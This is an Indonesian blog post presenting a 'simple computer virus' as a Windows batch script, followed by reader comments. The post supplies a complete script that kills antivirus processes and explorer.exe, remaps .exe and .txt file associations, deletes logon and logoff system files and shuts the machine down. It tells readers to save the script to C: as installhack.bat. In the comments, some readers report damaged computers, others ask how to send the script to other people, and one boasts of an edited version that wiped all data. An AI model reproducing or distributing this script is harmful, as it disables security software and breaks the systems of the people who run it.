Virus komputer adalah sebuah program komputer yang dapat menyalin sendiri atau menggandakan dirinya sendiri dan menginfeksi system komputer yang secara umum bersifat merusak. Tetapi, taukah kamu bahwa virus komputer itu dapat dibuat secara sederhana, tulisan dibawah ini merupakan salah satu cara membuat virus komputer dengan cara yang sangat sederhana. Tetapi sebelum kamu membaca dan mempraktekkan tulisan tersebut perlu dipahami bahwa postingan ini hanya bersifat menambah pengetahuan kamu bukan sebagai hal yang berdampak negatif dan apapun yang terjadi setelah mempraktekkan tulisan dibawah ini, saya terlepas dari dampak yang terjadi..

Mudah cara untuk membuat kode Virus

Virus ini dapat menyerang:
1. Menhapus, NAVAPSVC.exe
2. Menhapus, Explorer.exe (taskbar dan ikon akan hilang)
3. Menhapus, zonelabs.exe
4. mengubah asosiasi file exe menjadi txt (ketika membuka file exe, akan pergi ke notepad)
5. mengubah asosiasi file txt menjadi mp3 (ketika membuka file txt, maka akan terbuka WinAmp atau multimedia player)
6. Menghapus Login / Logoff Screens

Hanya Copy kode di bawah ini lalu paste Pada Notepad:

title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

Simpan di C: dengan nama installhack.bat
Selesai

semoga bermanfaat

43 komentar:

DEVI SUSIATI mengatakan...

virusx kren.....

Nickdotnet mengatakan...

@Devi: Thx sudah berkunjung :)

-Protect_Your_Mama- mengatakan...

om .. bagi pengalaman dong tentang creating virus sama bikinin penangkalnya ^^

BIASA mengatakan...

Yang jadi bahan pertanyaan saya apa berpengaruh terhadap komputer saya jika saya mengcopy paste ke data C ??? saya takut

Anonim mengatakan...

Anak saya mencoba mempraktekan membuat virus diatas...dan sekarang laptopnya jadi tak bisa digunakan...Bagaimana cara mengatasi virus yang sudah terlanjur menyerang laptop tersebut?

Terimaksih atas perhatian dan bantuannya..

Nickdotnet mengatakan...

@Biasa: Jika kamu menyimpan installhack.bat di drive C. Kemungkinan besar akan berpengaruh, lebih tepatnya saat kamu rebot (restart) komputer kamu

Nickdotnet mengatakan...

@Anonim: Mohon maaf atas kejadian seperti itu, dan saya ingatkan sebelum mencoba trips di atas ada baiknya di pertimbangkan resikonya. Untuk solusi mudahnya mungkin bisa di coba dengan menghapus file installhack.bat yang terletak di drive C: dan lakukan upgrade windows pada laptop kamu untuk memulihkan file yang rusak. thx sudah berkunjung :)

Nickdotnet mengatakan...

@-Protect_Your_Mama-: hehehe ane msh newbie gan, masih banyak yang ane belum ketahui :p

dj_andika mengatakan...

Saya malah edit tu tulisan,dan jadinya keren abis....
semua yang dibutuhin Windows gua kill,,,,
mantap...
ancur dah komputer orang...
hohohohoohoh..........

Nickdotnet mengatakan...

Mohon postingan ini jgn di salah gunakan :)

Anonim mengatakan...

Kakak, virus dibuat untuk apa sih?
Berguna nggak?

Nickdotnet mengatakan...

@Anonim: Sebelumnya thx sdh brkunjung :)

Berguna atau tidaknya sesuatu tergantung dari pemahaman sesorang, sebagai contoh: seorang doktor mempelajari berbagai jenis racun mematikan untuk mengetahui cara racun tsb dan cara menanggulanginya. begitu jg maksud dari postingan ini juga bertujuan menambah pengetahuan secara sederhana akan virus. sekian jawaban dari saya :)

henki mengatakan...

trims script nyaaaaaaaa..

didit mengatakan...

thanks ya mas scriptnya....

bachtiar mengatakan...

gan tolong kasih tau gimana cara ngilangin virus ni..
thx

Anonim mengatakan...

waduuh, in yang nge-post parah abis... org bikin penasaran pengen nyoba, trus bad impact deh.. selamat kepada yg telah memperoleh khasiatnya.. gan ksih tw cara ilanginnya juga donk..*hehe

Belalangtue mengatakan...

Permisi,,,

mau nanya nih,,
klo komputer kita dah di kasih Deep Freeze sebelum nyimpen atau membuat scrip di atas gimana tuh,?

ngefek g kekomputer kita,?

Septian Cheater mengatakan...

Kalo Ilangkan Virus TH Mudh Ajh Scan Pake ANti Virus Yang Krn Kaya AVira kaspersky TU Bagus

Ane Dh Dewasa

Rezpector mengatakan...

klo kode2ny tuh d gntii bsa gag kak??

Nickdotnet mengatakan...

@Rezpector: hmmm bisa2 aj koq sob, dikreasikan lg juga bs

Assalamu'alaikum mengatakan...

kalo kena virus gimana bersihinya?

Nickdotnet mengatakan...

@Assalamu'alaikum: berhubung program sederhana ini menyerang file system windows, terutama pada bagian
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q dan
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q

maka disarankan untuk mengupgrade atau lebih baiknya install ulang windows yang sebelumnya di full format

couplax mengatakan...

thanks infonya yach...

Joni mengatakan...

kodenya ku-edit malah jadi virus yang bahaya banget.Dulu kucoba langsung sreeeet komputer ku.Semua data di local disc:D habis dalam sekejap. muantap.Nanti kumasukin ke komputer orang ah. pasti mantaaap!^_^

Sultan mengatakan...

Virus ini apa ya? soal nya saya tahu cara menangkal 150 virus.

kukuh mengatakan...

permisi..saya adalah seorang yang baru blajar bagai mana cara mengganti..program yang baru blajar..supaya lebih mematikan..
tenag aja ini bahan perkuliahan saya.

Thomas mengatakan...

Orang yg gak tau nama nih virus berarti bodoh,udah tau kalo namanya installhack.bat,masa harus tanya?

Thomas mengatakan...

Cara ngilangin virusnya? mudah aja,kenapa file installhack.bat nggak dihapus permanen aja?

Anonim mengatakan...

gan, klow kita save di komp kita, kita juga kena donk, cara ksh ke org nya gmana?? thx

Nickdotnet mengatakan...

@Anonim: Sepengetahuan saya jika kamu menyimpannya bukan/selain di drive "c:\" maka tidak akan berjalan. kecuali jika kamu langsung mengeksekusi file tsb. dan ada beberapa cara mudah untuk ksh ke org lain, tetapi sangat tdak di sarankan untuk merusak/menjahili orang lain.

hacker mengatakan...

gan klo komputer aq kena viruz gmna ,,,,,saya kan di suruh buat virus sama guru saya tapi misalkan saya instal di komputer saya nnti malah rusak komputer saya .....TOLONG SOLUSIN NYA

desain kaos distro mengatakan...

ini berlaku untuk semoa os ya om

Anonim mengatakan...

gimana ngasik virus ke orang lain??????

gène 美しい mengatakan...

ngasih ke orang lewat flashdisk ato cd bluetooth tinggal kopi paste di c ato gimana,,,,,,,

jualan sate mengatakan...

mantap nich kayanya virus........

Anonim mengatakan...

gmna cara untuk menangkalnya...soalnya gak sengaja sudah keinstal di komputer gw ni..???
tolong blsanya,,,n segera!

buddyportnoy mengatakan...

hahahahahaha. virusnya kereeeennnn !! sampe sakit perut dan keringet dingin pas virus nya udah bekerja. bener-bener manjur tuh virus. untung udah ke repair. haha.

buddyportnoy mengatakan...

@septian cheater : percuma aja mau pake avira, kaspersky, ESET dan Smadav gua aja nggak berfungsi. soalnya file exe udah diubah jadi notepad.

Anonim mengatakan...

klo misalkan tuh virus hanya disimpan di notepad dan tidak di beri nama sebagaimana di sebutkan diatas, aktif atau tidak virus nya ???
dan ada cara ga buat kirim ke org dan virus tersebut langsung aktif dan org yg kita kirim virus tersebut tidak perlu menyimpan di file C: ???

Anonim mengatakan...

KK copy semua apa salah 1 ajha????

THQ....

Tatar_adi mengatakan...

Makasih sob,, atas infonya
ini sangat membantu sekali bagi pemula seperti saya...

Nickdotnet mengatakan...

Sama2 gan,, smoga bermanfaat

mahasiswa teladan mengatakan...

saya mahasiswa dari Jurusan Informatika
Artikel yang sangat menarik, bisa buat referensi ini ..
terimakasih ya infonya :)

Poskan Komentar